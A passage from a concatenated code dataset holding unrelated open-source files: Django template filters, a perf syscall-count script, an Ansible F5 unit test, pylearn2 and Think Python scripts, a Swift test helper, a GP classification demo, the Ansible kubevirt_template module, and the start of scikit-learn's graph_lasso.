Given a whole number, returns the requested digit of it, where 1 is the
right-most digit, 2 is the second-right-most digit, etc. Returns the
original value for invalid input (if input or argument is not an integer,
or if argument is less than 1). Otherwise, output is always an integer.
"""
try:
arg = int(arg)
value = int(value)
except ValueError:
return value # Fail silently for an invalid argument
if arg < 1:
return value
try:
return int(str(value)[-arg])
except IndexError:
return 0
###################
# DATES #
###################
@register.filter(expects_localtime=True, is_safe=False)
def date(value, arg=None):
"""Formats a date according to the given format."""
if value in (None, ''):
return ''
if arg is None:
arg = settings.DATE_FORMAT
try:
return formats.date_format(value, arg)
except AttributeError:
try:
return format(value, arg)
except AttributeError:
return ''
@register.filter(expects_localtime=True, is_safe=False)
def time(value, arg=None):
"""Formats a time according to the given format."""
if value in (None, ''):
return ''
if arg is None:
arg = settings.TIME_FORMAT
try:
return formats.time_format(value, arg)
except AttributeError:
try:
return time_format(value, arg)
except AttributeError:
return ''
@register.filter("timesince", is_safe=False)
def timesince_filter(value, arg=None):
"""Formats a date as the time since that date (i.e. "4 days, 6 hours")."""
if not value:
return ''
try:
if arg:
return timesince(value, arg)
return timesince(value)
except (ValueError, TypeError):
return ''
@register.filter("timeuntil", is_safe=False)
def timeuntil_filter(value, arg=None):
"""Formats a date as the time until that date (i.e. "4 days, 6 hours")."""
if not value:
return ''
try:
return timeuntil(value, arg)
except (ValueError, TypeError):
return ''
###################
# LOGIC #
###################
@register.filter(is_safe=False)
def default(value, arg):
"""If value is unavailable, use given default."""
return value or arg
@register.filter(is_safe=False)
def default_if_none(value, arg):
"""If value is None, use given default."""
if value is None:
return arg
return value
@register.filter(is_safe=False)
def divisibleby(value, arg):
"""Returns True if the value is devisible by the argument."""
return int(value) % int(arg) == 0
@register.filter(is_safe=False)
def yesno(value, arg=None):
"""
Given a string mapping values for true, false and (optionally) None,
returns one of those strings according to the value:
========== ====================== ==================================
Value Argument Outputs
========== ====================== ==================================
``True`` ``"yeah,no,maybe"`` ``yeah``
``False`` ``"yeah,no,maybe"`` ``no``
``None`` ``"yeah,no,maybe"`` ``maybe``
``None`` ``"yeah,no"`` ``"no"`` (converts None to False
if no mapping for None is given.
========== ====================== ==================================
"""
if arg is None:
arg = ugettext('yes,no,maybe')
bits = arg.split(',')
if len(bits) < 2:
return value # Invalid arg.
try:
yes, no, maybe = bits
except ValueError:
# Unpack list of wrong size (no "maybe" value provided).
yes, no, maybe = bits[0], bits[1], bits[1]
if value is None:
return maybe
if value:
return yes
return no
###################
# MISC #
###################
@register.filter(is_safe=True)
def filesizeformat(bytes):
"""
Formats the value like a 'human-readable' file size (i.e. 13 KB, 4.1 MB,
102 bytes, etc).
"""
try:
bytes = float(bytes)
except (TypeError,ValueError,UnicodeDecodeError):
return ungettext("%(size)d byte", "%(size)d bytes", 0) % {'size': 0}
filesize_number_format = lambda value: formats.number_format(round(value, 1), 1)
KB = 1<<10
MB = 1<<20
GB = 1<<30
TB = 1<<40
PB = 1<<50
if bytes < KB:
return ungettext("%(size)d byte", "%(size)d bytes", bytes) % {'size': bytes}
if bytes < MB:
return ugettext("%s KB") % filesize_number_format(bytes / KB)
if bytes < GB:
return ugettext("%s MB") % filesize_number_format(bytes / MB)
if bytes < TB:
return ugettext("%s GB") % filesize_number_format(bytes / GB)
if bytes < PB:
return ugettext("%s TB") % filesize_number_format(bytes / TB)
return ugettext("%s PB") % filesize_number_format(bytes / PB)
@register.filter(is_safe=False)
def pluralize(value, arg='s'):
"""
Returns a plural suffix if the value is not 1. By default, 's' is used as
the suffix:
* If value is 0, vote{{ value|pluralize }} displays "0 votes".
* If value is 1, vote{{ value|pluralize }} displays "1 vote".
* If value is 2, vote{{ value|pluralize }} displays "2 votes".
If an argument is provided, that string is used instead:
* If value is 0, class{{ value|pluralize:"es" }} displays "0 classes".
* If value is 1, class{{ value|pluralize:"es" }} displays "1 class".
* If value is 2, class{{ value|pluralize:"es" }} displays "2 classes".
If the provided argument contains a comma, the text before the comma is
used for the singular case and the text after the comma is used for the
plural case:
* If value is 0, cand{{ value|pluralize:"y,ies" }} displays "0 candies".
* If value is 1, cand{{ value|pluralize:"y,ies" }} displays "1 candy".
* If value is 2, cand{{ value|pluralize:"y,ies" }} displays "2 candies".
"""
if not ',' in arg:
arg = ',' + arg
bits = arg.split(',')
if len(bits) > 2:
return ''
singular_suffix, plural_suffix = bits[:2]
try:
if int(value) != 1:
return plural_suffix
except ValueError: # Invalid string that's not a number.
pass
except TypeError: # Value isn't a string or a number; maybe it's a list?
try:
if len(value) != 1:
return plural_suffix
except TypeError: # len() of unsized object.
pass
return singular_suffix
@register.filter("phone2numeric", is_safe=True)
def phone2numeric_filter(value):
"""Takes a phone number and converts it in to its numerical equivalent."""
return phone2numeric(value)
@register.filter(is_safe=True)
def pprint(value):
"""A wrapper around pprint.pprint -- for debugging, really."""
try:
return pformat(value)
except Exception as e:
return "Error in formatting: %s" % force_text(e, errors="replace")
| bsd-3-clause |
TeamTwisted/kernel_lge_hammerhead | tools/perf/scripts/python/syscall-counts-by-pid.py | 11180 | 1927 | # system call counts, by pid
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide system call totals, broken down by syscall.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os, sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import syscall_name
usage = "perf script -s syscall-counts-by-pid.py [comm]\n";
for_comm = None
for_pid = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
try:
for_pid = int(sys.argv[1])
except:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
print_syscall_totals()
def raw_syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, args):
if (for_comm and common_comm != for_comm) or \
(for_pid and common_pid != for_pid ):
return
try:
syscalls[common_comm][common_pid][id] += 1
except TypeError:
syscalls[common_comm][common_pid][id] = 1
def print_syscall_totals():
if for_comm is not None:
print "\nsyscall events for %s:\n\n" % (for_comm),
else:
print "\nsyscall events by comm/pid:\n\n",
print "%-40s %10s\n" % ("comm [pid]/syscalls", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"----------"),
comm_keys = syscalls.keys()
for comm in comm_keys:
pid_keys = syscalls[comm].keys()
for pid in pid_keys:
print "\n%s [%d]\n" % (comm, pid),
id_keys = syscalls[comm][pid].keys()
for id, val in sorted(syscalls[comm][pid].iteritems(), \
key = lambda(k, v): (v, k), reverse = True):
print " %-38s %10d\n" % (syscall_name(id), val),
| gpl-2.0 |
jmighion/ansible | test/units/modules/network/f5/test_bigip_irule.py | 51 | 8741 | # -*- coding: utf-8 -*-
#
# Copyright 2017 F5 Networks Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public Liccense for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import sys
from nose.plugins.skip import SkipTest
if sys.version_info < (2, 7):
raise SkipTest("F5 Ansible modules require Python >= 2.7")
from ansible.compat.tests import unittest
from ansible.compat.tests.mock import patch, mock_open, Mock
from ansible.module_utils import basic
from ansible.module_utils._text import to_bytes
from ansible.module_utils.f5_utils import AnsibleF5Client
from ansible.module_utils.six import PY3
try:
from library.bigip_irule import Parameters
from library.bigip_irule import ModuleManager
from library.bigip_irule import ArgumentSpec
from library.bigip_irule import GtmManager
from library.bigip_irule import LtmManager
except ImportError:
try:
from ansible.modules.network.f5.bigip_irule import Parameters
from ansible.modules.network.f5.bigip_irule import ModuleManager
from ansible.modules.network.f5.bigip_irule import ArgumentSpec
from ansible.modules.network.f5.bigip_irule import GtmManager
from ansible.modules.network.f5.bigip_irule import LtmManager
except ImportError:
raise SkipTest("F5 Ansible modules require the f5-sdk Python library")
fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures')
fixture_data = {}
def set_module_args(args):
args = json.dumps({'ANSIBLE_MODULE_ARGS': args})
basic._ANSIBLE_ARGS = to_bytes(args)
def load_fixture(name):
path = os.path.join(fixture_path, name)
if path in fixture_data:
return fixture_data[path]
with open(path) as f:
data = f.read()
try:
data = json.loads(data)
except Exception:
pass
fixture_data[path] = data
return data
class BigIpObj(object):
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
class TestParameters(unittest.TestCase):
def test_module_parameters_ltm(self):
content = load_fixture('create_ltm_irule.tcl')
args = dict(
content=content,
module='ltm',
name='foo',
state='present'
)
p = Parameters(args)
assert p.content == content.strip()
def test_module_parameters_gtm(self):
content = load_fixture('create_gtm_irule.tcl')
args = dict(
content=content,
module='gtm',
name='foo',
state='present'
)
p = Parameters(args)
assert p.content == content.strip()
def test_api_parameters_ltm(self):
content = load_fixture('create_ltm_irule.tcl')
args = dict(
apiAnonymous=content
)
p = Parameters(args)
assert p.content == content.strip()
def test_return_api_params(self):
content = load_fixture('create_ltm_irule.tcl')
args = dict(
content=content,
module='ltm',
name='foo',
state='present'
)
p = Parameters(args)
params = p.api_params()
assert 'apiAnonymous' in params
@patch('ansible.module_utils.f5_utils.AnsibleF5Client._get_mgmt_root',
return_value=True)
class TestManager(unittest.TestCase):
def setUp(self):
self.spec = ArgumentSpec()
self.ltm_irules = []
self.gtm_irules = []
members = load_fixture('load_ltm_irules.json')
for item in members:
self.ltm_irules.append(BigIpObj(**item))
members = load_fixture('load_gtm_irules.json')
for item in members:
self.gtm_irules.append(BigIpObj(**item))
def test_create_ltm_irule(self, *args):
set_module_args(dict(
name='foo',
module='ltm',
content='this is my content',
partition='Common',
server='localhost',
password='password',
user='admin'
))
client = AnsibleF5Client(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode,
f5_product_name=self.spec.f5_product_name,
mutually_exclusive=self.spec.mutually_exclusive,
)
# Override methods in the specific type of manager
tm = LtmManager(client)
tm.exists = Mock(side_effect=[False, True])
tm.create_on_device = Mock(return_value=True)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(client)
mm.get_manager = Mock(return_value=tm)
results = mm.exec_module()
assert results['changed'] is True
assert results['content'] == 'this is my content'
def test_create_gtm_irule(self, *args):
set_module_args(dict(
name='foo',
module='gtm',
content='this is my content',
partition='Common',
server='localhost',
password='password',
user='admin'
))
client = AnsibleF5Client(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode,
f5_product_name=self.spec.f5_product_name,
mutually_exclusive=self.spec.mutually_exclusive,
)
# Override methods in the specific type of manager
tm = GtmManager(client)
tm.exists = Mock(side_effect=[False, True])
tm.create_on_device = Mock(return_value=True)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(client)
mm.get_manager = Mock(return_value=tm)
results = mm.exec_module()
assert results['changed'] is True
assert results['content'] == 'this is my content'
def test_create_gtm_irule_src(self, *args):
set_module_args(dict(
name='foo',
module='gtm',
src='/path/to/irules/foo.tcl',
partition='Common',
server='localhost',
password='password',
user='admin'
))
client = AnsibleF5Client(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode,
f5_product_name=self.spec.f5_product_name,
mutually_exclusive=self.spec.mutually_exclusive,
)
if PY3:
builtins_name = 'builtins'
else:
builtins_name = '__builtin__'
with patch(builtins_name + '.open', mock_open(read_data='this is my content'), create=True):
# Override methods in the specific type of manager
tm = GtmManager(client)
tm.exists = Mock(side_effect=[False, True])
tm.create_on_device = Mock(return_value=True)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(client)
mm.get_manager = Mock(return_value=tm)
results = mm.exec_module()
assert results['changed'] is True
assert results['content'] == 'this is my content'
assert results['module'] == 'gtm'
assert results['src'] == '/path/to/irules/foo.tcl'
assert len(results.keys()) == 4
def test_module_mutual_exclusion(self, *args):
set_module_args(dict(
content='foo',
module='ltm',
name='foo',
state='present',
src='/path/to/irules/foo.tcl',
partition='Common',
server='localhost',
password='password',
user='admin'
))
with patch('ansible.module_utils.basic.AnsibleModule.fail_json', unsafe=True) as mo:
AnsibleF5Client(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode,
f5_product_name=self.spec.f5_product_name,
mutually_exclusive=self.spec.mutually_exclusive,
)
mo.assert_called_once()
| gpl-3.0 |
hyqneuron/pylearn2-maxsom | pylearn2/scripts/dbm/show_reconstructions.py | 7 | 4853 | #!/usr/bin/env python
from __future__ import print_function
__authors__ = "Ian Goodfellow"
__copyright__ = "Copyright 2012, Universite de Montreal"
__credits__ = ["Ian Goodfellow"]
__license__ = "3-clause BSD"
__maintainer__ = "LISA Lab"
"""
Usage: python show_reconstructions <path_to_a_saved_DBM.pkl>
Displays a batch of data from the DBM's training set.
Then shows how the DBM reconstructs it if you run mean field
to estimate the hidden units, then do one mean field downward
pass from hidden_layers[0] to the visible layer.
"""
from pylearn2.utils import serial
import sys
from pylearn2.config import yaml_parse
from pylearn2.gui.patch_viewer import PatchViewer
from theano.compat.six.moves import input, xrange
from theano import function
rows = 5
cols = 10
m = rows * cols
_, model_path = sys.argv
print('Loading model...')
model = serial.load(model_path)
model.set_batch_size(m)
dataset_yaml_src = model.dataset_yaml_src
print('Loading data...')
dataset = yaml_parse.load(dataset_yaml_src)
x = input('use test set? (y/n) ')
if x == 'y':
dataset = dataset.get_test_set()
else:
assert x == 'n'
vis_batch = dataset.get_batch_topo(m)
_, patch_rows, patch_cols, channels = vis_batch.shape
assert _ == m
mapback = hasattr(dataset, 'mapback_for_viewer')
actual_cols = 2 * cols * (1 + mapback) * (1 + (channels == 2))
pv = PatchViewer((rows, actual_cols), (patch_rows, patch_cols), is_color=(channels == 3))
batch = model.visible_layer.space.make_theano_batch()
topo = batch.ndim > 2
reconstruction = model.reconstruct(batch)
recons_func = function([batch], reconstruction)
def show():
ipt = vis_batch.copy()
if not topo:
ipt = dataset.get_design_matrix(ipt)
recons_batch = recons_func(ipt.astype(batch.dtype))
if not topo:
recons_batch = dataset.get_topological_view(recons_batch)
if mapback:
design_vis_batch = vis_batch
if design_vis_batch.ndim != 2:
design_vis_batch = dataset.get_design_matrix(design_vis_batch.copy())
mapped_batch_design = dataset.mapback(design_vis_batch.copy())
mapped_batch = dataset.get_topological_view(
mapped_batch_design.copy())
design_r_batch = recons_batch.copy()
if design_r_batch.ndim != 2:
design_r_batch = dataset.get_design_matrix(design_r_batch.copy())
mapped_r_design = dataset.mapback(design_r_batch.copy())
mapped_r_batch = dataset.get_topological_view(mapped_r_design.copy())
for row in xrange(rows):
row_start = cols * row
for j in xrange(cols):
vis_patch = vis_batch[row_start+j,:,:,:].copy()
adjusted_vis_patch = dataset.adjust_for_viewer(vis_patch)
if vis_patch.shape[-1] == 2:
pv.add_patch(adjusted_vis_patch[:,:,1], rescale=False)
pv.add_patch(adjusted_vis_patch[:,:,0], rescale=False)
else:
pv.add_patch(adjusted_vis_patch, rescale = False)
r = vis_patch
#print 'vis: '
#for ch in xrange(3):
# chv = r[:,:,ch]
# print '\t',ch,(chv.min(),chv.mean(),chv.max())
if mapback:
pv.add_patch(dataset.adjust_for_viewer(
mapped_batch[row_start+j,:,:,:].copy()), rescale = False)
if recons_batch.shape[-1] == 2:
pv.add_patch(dataset.adjust_to_be_viewed_with(
recons_batch[row_start+j,:,:,1].copy(),
vis_patch), rescale = False)
pv.add_patch(dataset.adjust_to_be_viewed_with(
recons_batch[row_start+j,:,:,0].copy(),
vis_patch), rescale = False)
else:
pv.add_patch(dataset.adjust_to_be_viewed_with(
recons_batch[row_start+j,:,:,:].copy(),
vis_patch), rescale = False)
r = recons_batch[row_start+j,:,:,:]
#print 'recons: '
#for ch in xrange(3):
# chv = r[:,:,ch]
# print '\t',ch,(chv.min(),chv.mean(),chv.max())
if mapback:
pv.add_patch(dataset.adjust_to_be_viewed_with(
mapped_r_batch[row_start+j,:,:,:].copy(),
mapped_batch[row_start+j,:,:,:].copy()),rescale = False)
pv.show()
if hasattr(model.visible_layer, 'beta'):
beta = model.visible_layer.beta.get_value()
#model.visible_layer.beta.set_value(beta * 100.)
print('beta: ',(beta.min(), beta.mean(), beta.max()))
while True:
show()
print('Displaying reconstructions. (q to quit, ENTER = show more)')
while True:
x = input()
if x == 'q':
quit()
if x == '':
x = 1
break
else:
print('Invalid input, try again')
vis_batch = dataset.get_batch_topo(m)
| bsd-3-clause |
eshasharma/mase | python101/code/birthday.py | 14 | 1302 | """This module contains code from
Think Python by Allen B. Downey
http://thinkpython.com
Copyright 2012 Allen B. Downey
License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html
"""
import random
def has_duplicates(t):
"""Returns True if any element appears more than once in (t),
False otherwise."""
s = t[:]
s.sort()
for i in range(len(s)-1):
if s[i] == s[i+1]:
return True
return False
def random_bdays(n):
"""Returns a list of integers between 1 and 365, with length (n)."""
t = []
for i in range(n):
bday = random.randint(1, 365)
t.append(bday)
return t
def count_matches(students, samples):
"""Generates (samples) samples of (students) students, and counts
how many of them have at least one pair of students with the same bday."""
count = 0
for i in range(samples):
t = random_bdays(students)
if has_duplicates(t):
count += 1
return count
"""run the birthday simulation 1000 times and print the number of matches"""
num_students = 23
num_simulations = 1000
count = count_matches(num_students, num_simulations)
print 'After %d simulations' % num_simulations
print 'with %d students' % num_students
print 'there were %d simulations with at least one match' % count
| unlicense |
zaitcev/swift-lfs | test/__init__.py | 6 | 1475 | # See http://code.google.com/p/python-nose/issues/detail?id=373
# The code below enables nosetests to work with i18n _() blocks
import __builtin__
import sys
import os
from swift.common.utils import readconf
setattr(__builtin__, '_', lambda x: x)
# Work around what seems to be a Python bug.
# c.f. https://bugs.launchpad.net/swift/+bug/820185.
import logging
logging.raiseExceptions = False
def get_config(section_name=None, defaults=None):
"""
Attempt to get a test config dictionary.
:param section_name: the section to read (all sections if not defined)
:param defaults: an optional dictionary namespace of defaults
"""
config_file = os.environ.get('SWIFT_TEST_CONFIG_FILE',
'/etc/swift/test.conf')
config = {}
if defaults is not None:
config.update(defaults)
try:
config = readconf(config_file, section_name)
except SystemExit:
if not os.path.exists(config_file):
print >>sys.stderr, \
'Unable to read test config %s - file not found' \
% config_file
elif not os.access(config_file, os.R_OK):
print >>sys.stderr, \
'Unable to read test config %s - permission denied' \
% config_file
else:
print >>sys.stderr, \
'Unable to read test config %s - section %s not found' \
% (config_file, section_name)
return config
| apache-2.0 |
mlds-lab/egk | demo.py | 1 | 1643 | import numpy as np
import cPickle as pickle
from sklearn.svm import LinearSVC
import gp
from full_marginal import compute_means_covs
from fastfood import FastfoodEGK
def main():
np.random.seed(111)
with open('data/ECG200-50.pkl', 'rb') as f:
ts_train, ts_test, l_train, l_test = pickle.load(f)
# Estimate GP hyperparameters and the noise parameter by maximizing
# the marginal likelihood.
gp_parms = gp.learn_hyperparms(ts_train)
# All time series are defined over a common time interval [0, 1].
# We use 300 evenly-spaced reference time points between [0, 1]
# to represent each time series.
t_ref = np.linspace(0, 1, 300)
# Compute the marginal posterior mean and covariance matrix for
# both training and test time series
train_means, train_covs = compute_means_covs(ts_train, t_ref, gp_parms)
test_means, test_covs = compute_means_covs(ts_test, t_ref, gp_parms)
# We use 500 random features with low-rank approximation, rank 10 in this
# case, and normalize the random feature vector to have unit length.
# By dropping the rank argument or set rank to 0 turns off the low rank
# approximation.
# The parameters gamma and C can be chosen using cross validation.
rp = FastfoodEGK(gamma=20, n_sample=500, rank=10,
normalize=True)
clf = LinearSVC(C=100)
X_train = rp.fit_transform(train_means, train_covs)
clf.fit(X_train, l_train)
X_test = rp.transform(test_means, test_covs)
l_predict = clf.predict(X_test)
accuracy = np.mean(l_predict == l_test)
print accuracy
if __name__ == '__main__':
main()
| mit |
helldorado/ansible | lib/ansible/modules/cloud/kubevirt/kubevirt_template.py | 16 | 14883 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2019, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: kubevirt_template
short_description: Manage KubeVirt templates
description:
- Use Openshift Python SDK to manage the state of KubeVirt templates.
version_added: "2.8"
author: KubeVirt Team (@kubevirt)
options:
name:
description:
- Name of the Template object.
required: true
type: str
namespace:
description:
- Namespace where the Template object exists.
required: true
type: str
objects:
description:
- List of any valid API objects, such as a I(DeploymentConfig), I(Service), etc. The object
will be created exactly as defined here, with any parameter values substituted in prior to creation.
The definition of these objects can reference parameters defined earlier.
- As part of the the list user can pass also I(VirtualMachine) kind. When passing I(VirtualMachine)
user must use Ansible structure of the parameters not the Kubernetes API structure. For more information
please take a look at M(kubevirt_vm) module and at EXAMPLES section, where you can see example.
type: list
merge_type:
description:
- Whether to override the default patch merge approach with a specific type. By default, the strategic
merge will typically be used.
type: list
choices: [ json, merge, strategic-merge ]
display_name:
description:
- "A brief, user-friendly name, which can be employed by user interfaces."
type: str
description:
description:
- A description of the template.
- Include enough detail that the user will understand what is being deployed...
and any caveats they need to know before deploying. It should also provide links to additional information,
such as a README file."
type: str
long_description:
description:
- "Additional template description. This may be displayed by the service catalog, for example."
type: str
provider_display_name:
description:
- "The name of the person or organization providing the template."
type: str
documentation_url:
description:
- "A URL referencing further documentation for the template."
type: str
support_url:
description:
- "A URL where support can be obtained for the template."
type: str
editable:
description:
- "Extension for hinting at which elements should be considered editable.
List of jsonpath selectors. The jsonpath root is the objects: element of the template."
- This is parameter can be used only when kubevirt addon is installed on your openshift cluster.
type: list
default_disk:
description:
- "The goal of default disk is to define what kind of disk is supported by the OS mainly in
terms of bus (ide, scsi, sata, virtio, ...)"
- The C(default_disk) parameter define configuration overlay for disks that will be applied on top of disks
during virtual machine creation to define global compatibility and/or performance defaults defined here.
- This is parameter can be used only when kubevirt addon is installed on your openshift cluster.
type: dict
default_volume:
description:
- "The goal of default volume is to be able to configure mostly performance parameters like
caches if those are exposed by the underlying volume implementation."
- The C(default_volume) parameter define configuration overlay for volumes that will be applied on top of volumes
during virtual machine creation to define global compatibility and/or performance defaults defined here.
- This is parameter can be used only when kubevirt addon is installed on your openshift cluster.
type: dict
default_nic:
description:
- "The goal of default network is similar to I(default_disk) and should be used as a template
to ensure OS compatibility and performance."
- The C(default_nic) parameter define configuration overlay for nic that will be applied on top of nics
during virtual machine creation to define global compatibility and/or performance defaults defined here.
- This is parameter can be used only when kubevirt addon is installed on your openshift cluster.
type: dict
default_network:
description:
- "The goal of default network is similar to I(default_volume) and should be used as a template
that specifies performance and connection parameters (L2 bridge for example)"
- The C(default_network) parameter define configuration overlay for networks that will be applied on top of networks
during virtual machine creation to define global compatibility and/or performance defaults defined here.
- This is parameter can be used only when kubevirt addon is installed on your openshift cluster.
type: dict
icon_class:
description:
- "An icon to be displayed with your template in the web console. Choose from our existing logo
icons when possible. You can also use icons from FontAwesome. Alternatively, provide icons through
CSS customizations that can be added to an OpenShift Container Platform cluster that uses your template.
You must specify an icon class that exists, or it will prevent falling back to the generic icon."
type: str
parameters:
description:
- "Parameters allow a value to be supplied by the user or generated when the template is instantiated.
Then, that value is substituted wherever the parameter is referenced. References can be defined in any
field in the objects list field. This is useful for generating random passwords or allowing the user to
supply a host name or other user-specific value that is required to customize the template."
- "More information can be foud at: U(https://docs.openshift.com/container-platform/3.6/dev_guide/templates.html#writing-parameters)"
type: list
version:
description:
- Template structure version.
- This is parameter can be used only when kubevirt addon is installed on your openshift cluster.
type: str
extends_documentation_fragment:
- k8s_auth_options
- k8s_state_options
requirements:
- python >= 2.7
- openshift >= 0.8.2
'''
EXAMPLES = '''
- name: Create template 'mytemplate'
kubevirt_template:
state: present
name: myvmtemplate
namespace: templates
display_name: Generic cirros template
description: Basic cirros template
long_description: Verbose description of cirros template
provider_display_name: Just Be Cool, Inc.
documentation_url: http://theverycoolcompany.com
support_url: http://support.theverycoolcompany.com
icon_class: icon-linux
default_disk:
disk:
bus: virtio
default_nic:
model: virtio
default_network:
resource:
resourceName: bridge.network.kubevirt.io/cnvmgmt
default_volume:
containerDisk:
image: kubevirt/cirros-container-disk-demo:latest
objects:
- name: ${NAME}
kind: VirtualMachine
memory: ${MEMORY_SIZE}
state: present
namespace: vms
parameters:
- name: NAME
description: VM name
generate: expression
from: 'vm-[A-Za-z0-9]{8}'
- name: MEMORY_SIZE
description: Memory size
value: 1Gi
- name: Remove template 'myvmtemplate'
kubevirt_template:
state: absent
name: myvmtemplate
namespace: templates
'''
RETURN = '''
kubevirt_template:
description:
- The template dictionary specification returned by the API.
returned: success
type: complex
contains: {}
'''
import copy
import traceback
from ansible.module_utils.k8s.common import AUTH_ARG_SPEC
from ansible.module_utils.kubevirt import (
virtdict,
KubeVirtRawModule,
API_GROUP,
MAX_SUPPORTED_API_VERSION
)
TEMPLATE_ARG_SPEC = {
'name': {'required': True},
'namespace': {'required': True},
'state': {
'default': 'present',
'choices': ['present', 'absent'],
},
'force': {
'type': 'bool',
'default': False,
},
'merge_type': {
'type': 'list',
'choices': ['json', 'merge', 'strategic-merge']
},
'objects': {
'type': 'list',
},
'display_name': {
'type': 'str',
},
'description': {
'type': 'str',
},
'long_description': {
'type': 'str',
},
'provider_display_name': {
'type': 'str',
},
'documentation_url': {
'type': 'str',
},
'support_url': {
'type': 'str',
},
'icon_class': {
'type': 'str',
},
'version': {
'type': 'str',
},
'editable': {
'type': 'list',
},
'default_disk': {
'type': 'dict',
},
'default_volume': {
'type': 'dict',
},
'default_network': {
'type': 'dict',
},
'default_nic': {
'type': 'dict',
},
'parameters': {
'type': 'list',
},
}
class KubeVirtVMTemplate(KubeVirtRawModule):
@property
def argspec(self):
""" argspec property builder """
argument_spec = copy.deepcopy(AUTH_ARG_SPEC)
argument_spec.update(TEMPLATE_ARG_SPEC)
return argument_spec
def execute_module(self):
# Parse parameters specific for this module:
definition = virtdict()
# Execute the CRUD of VM template:
kind = 'Template'
template_api_version = 'template.openshift.io/v1'
# Fill in template parameters:
definition['parameters'] = self.params.get('parameters')
# Fill in the default Label
labels = definition['metadata']['labels']
labels['template.cnv.io/type'] = 'vm'
# Fill in Openshift/Kubevirt template annotations:
annotations = definition['metadata']['annotations']
if self.params.get('display_name'):
annotations['openshift.io/display-name'] = self.params.get('display_name')
if self.params.get('description'):
annotations['description'] = self.params.get('description')
if self.params.get('long_description'):
annotations['openshift.io/long-description'] = self.params.get('long_description')
if self.params.get('provider_display_name'):
annotations['openshift.io/provider-display-name'] = self.params.get('provider_display_name')
if self.params.get('documentation_url'):
annotations['openshift.io/documentation-url'] = self.params.get('documentation_url')
if self.params.get('support_url'):
annotations['openshift.io/support-url'] = self.params.get('support_url')
if self.params.get('icon_class'):
annotations['iconClass'] = self.params.get('icon_class')
if self.params.get('version'):
annotations['template.cnv.io/version'] = self.params.get('version')
# TODO: Make it more Ansiblish, so user don't have to specify API JSON path, but rather Ansible params:
if self.params.get('editable'):
annotations['template.cnv.io/editable'] = self.params.get('editable')
# Set defaults annotations:
if self.params.get('default_disk'):
annotations['defaults.template.cnv.io/disk'] = self.params.get('default_disk').get('name')
if self.params.get('default_volume'):
annotations['defaults.template.cnv.io/volume'] = self.params.get('default_volume').get('name')
if self.params.get('default_nic'):
annotations['defaults.template.cnv.io/nic'] = self.params.get('default_nic').get('name')
if self.params.get('default_network'):
annotations['defaults.template.cnv.io/network'] = self.params.get('default_network').get('name')
# Proccess objects:
self.client = self.get_api_client()
definition['objects'] = []
objects = self.params.get('objects') or []
for obj in objects:
if obj['kind'] != 'VirtualMachine':
definition['objects'].append(obj)
else:
vm_definition = virtdict()
# Set VM defaults:
if self.params.get('default_disk'):
vm_definition['spec']['template']['spec']['domain']['devices']['disks'] = [self.params.get('default_disk')]
if self.params.get('default_volume'):
vm_definition['spec']['template']['spec']['volumes'] = [self.params.get('default_volume')]
if self.params.get('default_nic'):
vm_definition['spec']['template']['spec']['domain']['devices']['interfaces'] = [self.params.get('default_nic')]
if self.params.get('default_network'):
vm_definition['spec']['template']['spec']['networks'] = [self.params.get('default_network')]
# Set kubevirt API version:
vm_definition['apiVersion'] = '%s/%s' % (API_GROUP, MAX_SUPPORTED_API_VERSION)
# Contruct k8s vm API object:
vm_template = vm_definition['spec']['template']
dummy, vm_def = self.construct_vm_template_definition('VirtualMachine', vm_definition, vm_template, obj)
definition['objects'].append(vm_def)
# Create template:
resource = self.client.resources.get(api_version=template_api_version, kind=kind, name='templates')
definition = self.set_defaults(resource, definition)
result = self.perform_action(resource, definition)
# Return from the module:
self.exit_json(**{
'changed': result['changed'],
'kubevirt_template': result.pop('result'),
'result': result,
})
def main():
module = KubeVirtVMTemplate()
try:
module.execute_module()
except Exception as e:
module.fail_json(msg=str(e), exception=traceback.format_exc())
if __name__ == '__main__':
main()
| gpl-3.0 |
YinongLong/scikit-learn | sklearn/covariance/graph_lasso_.py | 51 | 26432 | """GraphLasso: sparse inverse covariance estimation with an l1-penalized
estimator.
"""
# Author: Gael Varoquaux <[email protected]>
# License: BSD 3 clause
# Copyright: INRIA
import warnings
import operator
import sys
import time
import numpy as np
from scipy import linalg
from .empirical_covariance_ import (empirical_covariance, EmpiricalCovariance,
log_likelihood)
from ..exceptions import ConvergenceWarning
from ..utils.extmath import pinvh
from ..utils.validation import check_random_state, check_array
